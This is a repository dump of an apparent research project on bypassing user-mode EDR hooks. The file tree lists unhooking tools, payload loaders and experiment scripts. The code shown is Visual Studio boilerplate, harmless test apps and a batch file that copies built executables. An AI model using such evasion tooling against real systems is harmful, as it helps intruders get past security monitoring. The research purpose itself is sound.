├── ApplicationsToCheckForHooks ├── SomeConProgram │ ├── SomeConProgram.sln │ └── SomeConProgram │ │ ├── SomeConProgram.cpp │ │ ├── SomeConProgram.vcxproj │ │ ├── SomeConProgram.vcxproj.filters │ │ └── SomeConProgram.vcxproj.user └── SomeDeskProject │ ├── SomeDeskProject.sln │ └── SomeDeskProject │ ├── Resource.h │ ├── SomeDeskProject.cpp │ ├── SomeDeskProject.h │ ├── SomeDeskProject.ico │ ├── SomeDeskProject.rc │ ├── SomeDeskProject.vcxproj │ ├── SomeDeskProject.vcxproj.filters │ ├── SomeDeskProject.vcxproj.user │ ├── framework.h │ ├── small.ico │ └── targetver.h ├── CollectRequiredFiles.bat ├── CustomCode ├── CustomCode.sln ├── HookFinder │ ├── HookDetector.h │ ├── HookFinder.filters │ ├── HookFinder.vcxproj │ ├── Syscalls.asm │ ├── main.cpp │ ├── main.cpp.old.relocation │ ├── main.h │ ├── sysc_sw2.asm │ └── sysc_sw2.h ├── InterprocessMethodCloning │ ├── InterProcessFunctionCopying.h │ ├── InterprocessMethodCloning.vcxproj │ ├── InterprocessMethodCloning.vcxproj.filters │ ├── Syscalls.asm │ ├── main.cpp │ ├── sysc_sw2.asm │ └── sysc_sw2.h ├── InterprocessSectionCopying │ ├── InterProcessSectionCopying.h │ ├── InterProcessSectionCopying.vcxproj │ ├── InterProcessSectionCopying.vcxproj.filters │ ├── Syscalls.asm │ ├── main.cpp │ ├── sysc_sw2.asm │ └── sysc_sw2.h ├── PaLoCF │ ├── PaLoCF.cpp │ ├── PaLoCF.vcxproj │ └── PaLoCF.vcxproj.filters ├── PaLoInj │ ├── PaLoInj.cpp │ ├── PaLoInj.vcxproj │ └── PaLoInj.vcxproj.filters ├── PaLoIns │ ├── PaLoIns.cpp │ ├── PaLoIns.vcxproj │ └── PaLoIns.vcxproj.filters ├── PerunsFart │ ├── PerunsFart.cpp │ ├── PerunsFart.h │ ├── PerunsFart.vcxproj │ ├── PerunsFart.vcxproj.filters │ ├── Syscalls.asm │ ├── main.cpp │ └── sysc_sw2.asm └── compile_slightly_different_payloads.bat ├── DumpertResearch ├── Outflank-Dumpert.sln └── Outflank-Dumpert │ ├── Dumpert.cpp │ ├── Dumpert.h │ ├── Outflank-Dumpert.vcxproj │ ├── Outflank-Dumpert.vcxproj.filters │ └── Syscalls.asm ├── ExperimentScript ├── runAllExperiments.ps1 └── runHookCorruptorExperiments.ps1 ├── HookCorruptor ├── Outflank-Dumpert.sln └── Outflank-Dumpert │ ├── Dumpert.cpp │ ├── Dumpert.h │ ├── Outflank-Dumpert.vcxproj │ ├── Outflank-Dumpert.vcxproj.filters │ └── Syscalls.asm ├── README.md └── ShellycoatResearch ├── Bin ├── shellycoat_x64-hexedited.bin ├── shellycoat_x64-hexedited.dll └── shellycoat_x64.dll ├── LICENSE ├── Python ├── ConvertToShellcode.py ├── ShellcodeRDI.py └── __pycache__ │ └── ShellcodeRDI.cpython-39.pyc ├── README.md ├── Screenshots ├── bypass-techniques.png ├── capa.PNG ├── hooking.gif ├── reading-ntdll.png ├── section-remapping.png ├── shellycoat-internal.gif ├── unhooking.gif └── why-syscall.png ├── Src ├── SectionRemap.h ├── Structs.h ├── Syscalls.h ├── dllmain.cpp ├── stub.binaaa ├── sysc_sw1.asm ├── sysc_sw1.h └── syscalls64.asm ├── Testing ├── Loader.cpp ├── compile64.bat └── edr.dll └── compile64_cli2.bat /ApplicationsToCheckForHooks/SomeConProgram/SomeConProgram.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.31112.23 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SomeConProgram", "SomeConProgram\SomeConProgram.vcxproj", "{DBC3D8EF-136D-4B82-B197-772D47F94A3D}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {DBC3D8EF-136D-4B82-B197-772D47F94A3D}.Debug|x64.ActiveCfg = Debug|x64 17 | {DBC3D8EF-136D-4B82-B197-772D47F94A3D}.Debug|x64.Build.0 = Debug|x64 18 | {DBC3D8EF-136D-4B82-B197-772D47F94A3D}.Debug|x86.ActiveCfg = Debug|Win32 19 | {DBC3D8EF-136D-4B82-B197-772D47F94A3D}.Debug|x86.Build.0 = Debug|Win32 20 | {DBC3D8EF-136D-4B82-B197-772D47F94A3D}.Release|x64.ActiveCfg = Release|x64 21 | {DBC3D8EF-136D-4B82-B197-772D47F94A3D}.Release|x64.Build.0 = Release|x64 22 | {DBC3D8EF-136D-4B82-B197-772D47F94A3D}.Release|x86.ActiveCfg = Release|Win32 23 | {DBC3D8EF-136D-4B82-B197-772D47F94A3D}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {AF4A9AEB-59F7-4A3D-8275-411A0C919EDC} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /ApplicationsToCheckForHooks/SomeConProgram/SomeConProgram/SomeConProgram.cpp: -------------------------------------------------------------------------------- 1 | // SomeConProgram.cpp : This file contains the 'main' function. Program execution begins and ends there. 2 | // 3 | 4 | #include 5 | 6 | int main() 7 | { 8 | printf("This is a simple console app\n"); 9 | printf("Press Any Key to Continue\n"); 10 | getchar(); 11 | } 12 | 13 | // Run program: Ctrl + F5 or Debug > Start Without Debugging menu 14 | // Debug program: F5 or Debug > Start Debugging menu 15 | 16 | // Tips for Getting Started: 17 | // 1. Use the Solution Explorer window to add/manage files 18 | // 2. Use the Team Explorer window to connect to source control 19 | // 3. Use the Output window to see build output and other messages 20 | // 4. Use the Error List window to view errors 21 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 22 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file 23 | -------------------------------------------------------------------------------- /ApplicationsToCheckForHooks/SomeConProgram/SomeConProgram/SomeConProgram.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {dbc3d8ef-136d-4b82-b197-772d47f94a3d} 25 | SomeConProgram 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 90 | true 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | Level3 100 | true 101 | true 102 | true 103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | true 105 | 106 | 107 | Console 108 | true 109 | true 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 118 | true 119 | 120 | 121 | Console 122 | true 123 | 124 | 125 | 126 | 127 | Level3 128 | true 129 | true 130 | true 131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 132 | true 133 | 134 | 135 | Console 136 | true 137 | true 138 | true 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | -------------------------------------------------------------------------------- /ApplicationsToCheckForHooks/SomeConProgram/SomeConProgram/SomeConProgram.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /ApplicationsToCheckForHooks/SomeConProgram/SomeConProgram/SomeConProgram.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /ApplicationsToCheckForHooks/SomeDeskProject/SomeDeskProject.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.31112.23 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SomeDeskProject", "SomeDeskProject\SomeDeskProject.vcxproj", "{56F8060F-CC95-412A-88CB-D8A25C3F718A}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {56F8060F-CC95-412A-88CB-D8A25C3F718A}.Debug|x64.ActiveCfg = Debug|x64 17 | {56F8060F-CC95-412A-88CB-D8A25C3F718A}.Debug|x64.Build.0 = Debug|x64 18 | {56F8060F-CC95-412A-88CB-D8A25C3F718A}.Debug|x86.ActiveCfg = Debug|Win32 19 | {56F8060F-CC95-412A-88CB-D8A25C3F718A}.Debug|x86.Build.0 = Debug|Win32 20 | {56F8060F-CC95-412A-88CB-D8A25C3F718A}.Release|x64.ActiveCfg = Release|x64 21 | {56F8060F-CC95-412A-88CB-D8A25C3F718A}.Release|x64.Build.0 = Release|x64 22 | {56F8060F-CC95-412A-88CB-D8A25C3F718A}.Release|x86.ActiveCfg = Release|Win32 23 | {56F8060F-CC95-412A-88CB-D8A25C3F718A}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {F73C855F-4FB0-4188-99E3-FA14B729F48D} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /ApplicationsToCheckForHooks/SomeDeskProject/SomeDeskProject/Resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by SomeDeskProject.rc 4 | 5 | #define IDS_APP_TITLE 103 6 | 7 | #define IDR_MAINFRAME 128 8 | #define IDD_SOMEDESKPROJECT_DIALOG 102 9 | #define IDD_ABOUTBOX 103 10 | #define IDM_ABOUT 104 11 | #define IDM_EXIT 105 12 | #define IDI_SOMEDESKPROJECT 107 13 | #define IDI_SMALL 108 14 | #define IDC_SOMEDESKPROJECT 109 15 | #define IDC_MYICON 2 16 | #ifndef IDC_STATIC 17 | #define IDC_STATIC -1 18 | #endif 19 | // Next default values for new objects 20 | // 21 | #ifdef APSTUDIO_INVOKED 22 | #ifndef APSTUDIO_READONLY_SYMBOLS 23 | 24 | #define _APS_NO_MFC 130 25 | #define _APS_NEXT_RESOURCE_VALUE 129 26 | #define _APS_NEXT_COMMAND_VALUE 32771 27 | #define _APS_NEXT_CONTROL_VALUE 1000 28 | #define _APS_NEXT_SYMED_VALUE 110 29 | #endif 30 | #endif 31 | -------------------------------------------------------------------------------- /ApplicationsToCheckForHooks/SomeDeskProject/SomeDeskProject/SomeDeskProject.cpp: -------------------------------------------------------------------------------- 1 | // SomeDeskProject.cpp : Defines the entry point for the application. 2 | // 3 | 4 | #include "framework.h" 5 | #include "SomeDeskProject.h" 6 | 7 | #define MAX_LOADSTRING 100 8 | 9 | // Global Variables: 10 | HINSTANCE hInst; // current instance 11 | WCHAR szTitle[MAX_LOADSTRING]; // The title bar text 12 | WCHAR szWindowClass[MAX_LOADSTRING]; // the main window class name 13 | 14 | // Forward declarations of functions included in this code module: 15 | ATOM MyRegisterClass(HINSTANCE hInstance); 16 | BOOL InitInstance(HINSTANCE, int); 17 | LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM); 18 | INT_PTR CALLBACK About(HWND, UINT, WPARAM, LPARAM); 19 | 20 | int APIENTRY wWinMain(_In_ HINSTANCE hInstance, 21 | _In_opt_ HINSTANCE hPrevInstance, 22 | _In_ LPWSTR lpCmdLine, 23 | _In_ int nCmdShow) 24 | { 25 | UNREFERENCED_PARAMETER(hPrevInstance); 26 | UNREFERENCED_PARAMETER(lpCmdLine); 27 | 28 | // TODO: Place code here. 29 | 30 | // Initialize global strings 31 | LoadStringW(hInstance, IDS_APP_TITLE, szTitle, MAX_LOADSTRING); 32 | LoadStringW(hInstance, IDC_SOMEDESKPROJECT, szWindowClass, MAX_LOADSTRING); 33 | MyRegisterClass(hInstance); 34 | 35 | // Perform application initialization: 36 | if (!InitInstance (hInstance, nCmdShow)) 37 | { 38 | return FALSE; 39 | } 40 | 41 | HACCEL hAccelTable = LoadAccelerators(hInstance, MAKEINTRESOURCE(IDC_SOMEDESKPROJECT)); 42 | 43 | MSG msg; 44 | 45 | // Main message loop: 46 | while (GetMessage(&msg, nullptr, 0, 0)) 47 | { 48 | if (!TranslateAccelerator(msg.hwnd, hAccelTable, &msg)) 49 | { 50 | TranslateMessage(&msg); 51 | DispatchMessage(&msg); 52 | } 53 | } 54 | 55 | return (int) msg.wParam; 56 | } 57 | 58 | 59 | 60 | // 61 | // FUNCTION: MyRegisterClass() 62 | // 63 | // PURPOSE: Registers the window class. 64 | // 65 | ATOM MyRegisterClass(HINSTANCE hInstance) 66 | { 67 | WNDCLASSEXW wcex; 68 | 69 | wcex.cbSize = sizeof(WNDCLASSEX); 70 | 71 | wcex.style = CS_HREDRAW | CS_VREDRAW; 72 | wcex.lpfnWndProc = WndProc; 73 | wcex.cbClsExtra = 0; 74 | wcex.cbWndExtra = 0; 75 | wcex.hInstance = hInstance; 76 | wcex.hIcon = LoadIcon(hInstance, MAKEINTRESOURCE(IDI_SOMEDESKPROJECT)); 77 | wcex.hCursor = LoadCursor(nullptr, IDC_ARROW); 78 | wcex.hbrBackground = (HBRUSH)(COLOR_WINDOW+1); 79 | wcex.lpszMenuName = MAKEINTRESOURCEW(IDC_SOMEDESKPROJECT); 80 | wcex.lpszClassName = szWindowClass; 81 | wcex.hIconSm = LoadIcon(wcex.hInstance, MAKEINTRESOURCE(IDI_SMALL)); 82 | 83 | return RegisterClassExW(&wcex); 84 | } 85 | 86 | // 87 | // FUNCTION: InitInstance(HINSTANCE, int) 88 | // 89 | // PURPOSE: Saves instance handle and creates main window 90 | // 91 | // COMMENTS: 92 | // 93 | // In this function, we save the instance handle in a global variable and 94 | // create and display the main program window. 95 | // 96 | BOOL InitInstance(HINSTANCE hInstance, int nCmdShow) 97 | { 98 | hInst = hInstance; // Store instance handle in our global variable 99 | 100 | HWND hWnd = CreateWindowW(szWindowClass, szTitle, WS_OVERLAPPEDWINDOW, 101 | CW_USEDEFAULT, 0, CW_USEDEFAULT, 0, nullptr, nullptr, hInstance, nullptr); 102 | 103 | if (!hWnd) 104 | { 105 | return FALSE; 106 | } 107 | 108 | ShowWindow(hWnd, nCmdShow); 109 | UpdateWindow(hWnd); 110 | 111 | return TRUE; 112 | } 113 | 114 | // 115 | // FUNCTION: WndProc(HWND, UINT, WPARAM, LPARAM) 116 | // 117 | // PURPOSE: Processes messages for the main window. 118 | // 119 | // WM_COMMAND - process the application menu 120 | // WM_PAINT - Paint the main window 121 | // WM_DESTROY - post a quit message and return 122 | // 123 | // 124 | LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam) 125 | { 126 | switch (message) 127 | { 128 | case WM_COMMAND: 129 | { 130 | int wmId = LOWORD(wParam); 131 | // Parse the menu selections: 132 | switch (wmId) 133 | { 134 | case IDM_ABOUT: 135 | DialogBox(hInst, MAKEINTRESOURCE(IDD_ABOUTBOX), hWnd, About); 136 | break; 137 | case IDM_EXIT: 138 | DestroyWindow(hWnd); 139 | break; 140 | default: 141 | return DefWindowProc(hWnd, message, wParam, lParam); 142 | } 143 | } 144 | break; 145 | case WM_PAINT: 146 | { 147 | PAINTSTRUCT ps; 148 | HDC hdc = BeginPaint(hWnd, &ps); 149 | // TODO: Add any drawing code that uses hdc here... 150 | EndPaint(hWnd, &ps); 151 | } 152 | break; 153 | case WM_DESTROY: 154 | PostQuitMessage(0); 155 | break; 156 | default: 157 | return DefWindowProc(hWnd, message, wParam, lParam); 158 | } 159 | return 0; 160 | } 161 | 162 | // Message handler for about box. 163 | INT_PTR CALLBACK About(HWND hDlg, UINT message, WPARAM wParam, LPARAM lParam) 164 | { 165 | UNREFERENCED_PARAMETER(lParam); 166 | switch (message) 167 | { 168 | case WM_INITDIALOG: 169 | return (INT_PTR)TRUE; 170 | 171 | case WM_COMMAND: 172 | if (LOWORD(wParam) == IDOK || LOWORD(wParam) == IDCANCEL) 173 | { 174 | EndDialog(hDlg, LOWORD(wParam)); 175 | return (INT_PTR)TRUE; 176 | } 177 | break; 178 | } 179 | return (INT_PTR)FALSE; 180 | } 181 | -------------------------------------------------------------------------------- /ApplicationsToCheckForHooks/SomeDeskProject/SomeDeskProject/SomeDeskProject.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "resource.h" 4 | -------------------------------------------------------------------------------- /ApplicationsToCheckForHooks/SomeDeskProject/SomeDeskProject/SomeDeskProject.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TomOS3/UserModeUnhooking/84f7d51df85d69f78183acd3ff149fe13a28b9ef/ApplicationsToCheckForHooks/SomeDeskProject/SomeDeskProject/SomeDeskProject.ico -------------------------------------------------------------------------------- /ApplicationsToCheckForHooks/SomeDeskProject/SomeDeskProject/SomeDeskProject.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TomOS3/UserModeUnhooking/84f7d51df85d69f78183acd3ff149fe13a28b9ef/ApplicationsToCheckForHooks/SomeDeskProject/SomeDeskProject/SomeDeskProject.rc -------------------------------------------------------------------------------- /ApplicationsToCheckForHooks/SomeDeskProject/SomeDeskProject/SomeDeskProject.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {56f8060f-cc95-412a-88cb-d8a25c3f718a} 25 | SomeDeskProject 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions) 90 | true 91 | 92 | 93 | Windows 94 | true 95 | 96 | 97 | 98 | 99 | Level3 100 | true 101 | true 102 | true 103 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions) 104 | true 105 | 106 | 107 | Windows 108 | true 109 | true 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | _DEBUG;_WINDOWS;%(PreprocessorDefinitions) 118 | true 119 | 120 | 121 | Windows 122 | true 123 | 124 | 125 | 126 | 127 | Level3 128 | true 129 | true 130 | true 131 | NDEBUG;_WINDOWS;%(PreprocessorDefinitions) 132 | true 133 | 134 | 135 | Windows 136 | true 137 | true 138 | true 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | -------------------------------------------------------------------------------- /ApplicationsToCheckForHooks/SomeDeskProject/SomeDeskProject/SomeDeskProject.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | Header Files 29 | 30 | 31 | 32 | 33 | Source Files 34 | 35 | 36 | 37 | 38 | Resource Files 39 | 40 | 41 | 42 | 43 | Resource Files 44 | 45 | 46 | Resource Files 47 | 48 | 49 | -------------------------------------------------------------------------------- /ApplicationsToCheckForHooks/SomeDeskProject/SomeDeskProject/SomeDeskProject.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /ApplicationsToCheckForHooks/SomeDeskProject/SomeDeskProject/framework.h: -------------------------------------------------------------------------------- 1 | // header.h : include file for standard system include files, 2 | // or project specific include files 3 | // 4 | 5 | #pragma once 6 | 7 | #include "targetver.h" 8 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 9 | // Windows Header Files 10 | #include 11 | // C RunTime Header Files 12 | #include 13 | #include 14 | #include 15 | #include 16 | -------------------------------------------------------------------------------- /ApplicationsToCheckForHooks/SomeDeskProject/SomeDeskProject/small.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TomOS3/UserModeUnhooking/84f7d51df85d69f78183acd3ff149fe13a28b9ef/ApplicationsToCheckForHooks/SomeDeskProject/SomeDeskProject/small.ico -------------------------------------------------------------------------------- /ApplicationsToCheckForHooks/SomeDeskProject/SomeDeskProject/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // // Including SDKDDKVer.h defines the highest available Windows platform. 4 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 5 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 6 | #include 7 | -------------------------------------------------------------------------------- /CollectRequiredFiles.bat: -------------------------------------------------------------------------------- 1 | rem Run this script from a x64 Native Tools Command Prompt 2 | 3 | copy DumpertResearch\x64\Release\Outflank-Dumpert.exe RequiredFiles\UHPR.exe 4 | copy ShellycoatResearch\Bin\shellycoat_x64.exe RequiredFiles\UHSR.exe 5 | copy HookDetectorTM\x64\Release\InterProcessFunctionCopying.exe RequiredFiles\UHIF.exe 6 | copy HookDetectorTM\x64\Release\InterProcessSectionCopying.exe RequiredFiles\UHIS.exe 7 | copy HookDetectorTM\x64\Release\HookDetector.exe RequiredFiles\HooDet.exe 8 | copy HookDetectorTM\x64\Release\PerunsFart.exe RequiredFiles\UHPF.exe 9 | 10 | call "HookDetectorTM\compile_slightly_different_payloads.bat" 11 | copy HookDetectorTM\*.exe RequiredFiles 12 | 13 | copy ExperimentScript\*.* RequiredFiles 14 | 15 | 16 | -------------------------------------------------------------------------------- /CustomCode/CustomCode.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.31112.23 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "InterProcessFunctionCopying", "InterprocessMethodCloning\InterprocessMethodCloning.vcxproj", "{C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "InterProcessSectionCopying", "InterProcessSectionCopying\InterprocessSectionCopying.vcxproj", "{17A0003B-18DC-1157-1F09-1B90AAEFBDF4}" 9 | EndProject 10 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HookDetector", "HookFinder\HookFinder.vcxproj", "{C7A1233B-98DC-4D57-8F09-5B90AAEFBDF4}" 11 | EndProject 12 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "PaLoInj", "PaLoInj\PaLoInj.vcxproj", "{2F83EC28-30EA-4FF5-843B-EE474D66B935}" 13 | EndProject 14 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "PaLoCF", "PaLoCF\PaLoCF.vcxproj", "{594AD1A0-2692-4C42-BC7B-B1799E500CC6}" 15 | EndProject 16 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "PaLoIns", "PaLoIns\PaLoIns.vcxproj", "{5785080C-1A0F-4C44-A7CD-B65504B3A62A}" 17 | EndProject 18 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "PerunsFart", "PerunsFart\PerunsFart.vcxproj", "{DBF7FEB0-F95D-41BE-8ECB-6CACA1BE2991}" 19 | EndProject 20 | Global 21 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 22 | Debug|x64 = Debug|x64 23 | Debug|x86 = Debug|x86 24 | Release|x64 = Release|x64 25 | Release|x86 = Release|x86 26 | EndGlobalSection 27 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 28 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x64.ActiveCfg = Debug|x64 29 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x64.Build.0 = Debug|x64 30 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x86.ActiveCfg = Debug|Win32 31 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x86.Build.0 = Debug|Win32 32 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x64.ActiveCfg = Release|x64 33 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x64.Build.0 = Release|x64 34 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x86.ActiveCfg = Release|Win32 35 | {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x86.Build.0 = Release|Win32 36 | {17A0003B-18DC-1157-1F09-1B90AAEFBDF4}.Debug|x64.ActiveCfg = Debug|x64 37 | {17A0003B-18DC-1157-1F09-1B90AAEFBDF4}.Debug|x64.Build.0 = Debug|x64 38 | {17A0003B-18DC-1157-1F09-1B90AAEFBDF4}.Debug|x86.ActiveCfg = Debug|Win32 39 | {17A0003B-18DC-1157-1F09-1B90AAEFBDF4}.Debug|x86.Build.0 = Debug|Win32 40 | {17A0003B-18DC-1157-1F09-1B90AAEFBDF4}.Release|x64.ActiveCfg = Release|x64 41 | {17A0003B-18DC-1157-1F09-1B90AAEFBDF4}.Release|x64.Build.0 = Release|x64 42 | {17A0003B-18DC-1157-1F09-1B90AAEFBDF4}.Release|x86.ActiveCfg = Release|Win32 43 | {17A0003B-18DC-1157-1F09-1B90AAEFBDF4}.Release|x86.Build.0 = Release|Win32 44 | {C7A1233B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x64.ActiveCfg = Debug|x64 45 | {C7A1233B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x64.Build.0 = Debug|x64 46 | {C7A1233B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x86.ActiveCfg = Debug|Win32 47 | {C7A1233B-98DC-4D57-8F09-5B90AAEFBDF4}.Debug|x86.Build.0 = Debug|Win32 48 | {C7A1233B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x64.ActiveCfg = Release|x64 49 | {C7A1233B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x64.Build.0 = Release|x64 50 | {C7A1233B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x86.ActiveCfg = Release|Win32 51 | {C7A1233B-98DC-4D57-8F09-5B90AAEFBDF4}.Release|x86.Build.0 = Release|Win32 52 | {2F83EC28-30EA-4FF5-843B-EE474D66B935}.Debug|x64.ActiveCfg = Debug|x64 53 | {2F83EC28-30EA-4FF5-843B-EE474D66B935}.Debug|x64.Build.0 = Debug|x64 54 | {2F83EC28-30EA-4FF5-843B-EE474D66B935}.Debug|x86.ActiveCfg = Debug|Win32 55 | {2F83EC28-30EA-4FF5-843B-EE474D66B935}.Debug|x86.Build.0 = Debug|Win32 56 | {2F83EC28-30EA-4FF5-843B-EE474D66B935}.Release|x64.ActiveCfg = Release|x64 57 | 